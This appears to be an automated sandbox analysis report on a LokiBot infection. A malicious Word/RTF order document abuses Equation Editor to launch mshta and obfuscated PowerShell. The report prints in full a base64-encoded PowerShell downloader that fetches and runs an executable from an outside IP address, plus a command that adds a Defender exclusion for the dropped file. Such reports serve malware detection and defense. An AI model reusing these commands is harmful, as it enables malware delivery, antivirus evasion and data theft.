Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: caspol[1].exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wininit.exe.10.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.SetAccessControl
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.AddAccessRule
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.SetAccessControl
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@22/41@7/3

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

18_2_0040650A

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

18_2_0040434D

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-000041492.docx.doc

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\wininit.exe	Mutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR8239.tmp

Jump to behavior

Source: PO-000041492.docx.doc

OLE indicator, Word Document stream: true

Source: 4.466364_2401 PACKING LIST.xlsx.0.dr

OLE indicator, Workbook stream: true

Source: PO-000041492.docx.doc	OLE document summary: title field not present or empty
Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................0.......(.P.....0.......8................_.........................s...............................s............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................_.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s............................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I.........................s..............".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......".....N.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................I...................... .a.g.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........J...................... .a.g.a..........."..... .......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................J...................... .a.g.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .d.e.V.i.C.E.c.r.E.D.E.n.t.i.A.L.d.E.p.l.O.Y.m.e.N.t......... .a.g.a...........".....8.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8...............5J...................... .a.g.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......... .a.g.a...........".....8.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8...............SJ...................... .a.g.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8...............fJ...................... .a.g.a.........................................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8...............rJ...................... .a.g.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.a...........".....F.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................J......................i.o.n.a.................l.......................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....0.......8................J......................i.o.n.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................Ry.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................^y.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................py.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................\|y.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n................................y.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........y.........................s.................... .......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................y.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......z.........................s....................$.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................z.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................$z.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................0z.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................Nz.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................`z.........................s....................l.......8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................lz.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............................~z.........................s............................8...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P..............................z.........................s............................8...............

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
